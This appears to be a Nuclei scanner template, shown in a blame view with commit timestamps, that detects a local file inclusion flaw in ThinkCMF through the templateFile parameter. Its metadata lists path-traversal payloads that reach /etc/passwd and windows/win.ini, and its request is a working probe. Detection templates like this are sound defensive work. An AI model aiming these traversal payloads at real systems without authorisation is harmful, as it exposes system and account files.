2021-02-11 15:46:20 +00:00
|
|
|
id: thinkcmf-lfi
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: ThinkCMF - Local File Inclusion
|
2021-02-11 15:46:20 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: ThinkCMF is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.freebuf.com/vuls/217586.html
|
2021-09-30 14:52:53 +00:00
|
|
|
metadata:
|
2022-04-22 10:38:41 +00:00
|
|
|
win-payload: ../../../../../../../../../../../../../../../../windows/win.ini
|
|
|
|
unix-payload: ../../../../../../../../../../../../../../../../etc/passwd
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: thinkcmf,lfi
|
2021-02-11 15:46:20 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-09-30 14:52:53 +00:00
|
|
|
- "{{BaseURL}}/?a=display&templateFile=README.md"
|
2021-02-11 15:46:20 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2021-02-12 04:59:05 +00:00
|
|
|
|
2021-09-30 14:52:53 +00:00
|
|
|
- type: word
|
|
|
|
condition: and
|
|
|
|
words:
|
|
|
|
- "ThinkCMF"
|
|
|
|
- "## README"
|
|
|
|
- "## UPDATE"
|
2021-02-11 15:46:20 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-08-05 13:57:51 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/05
|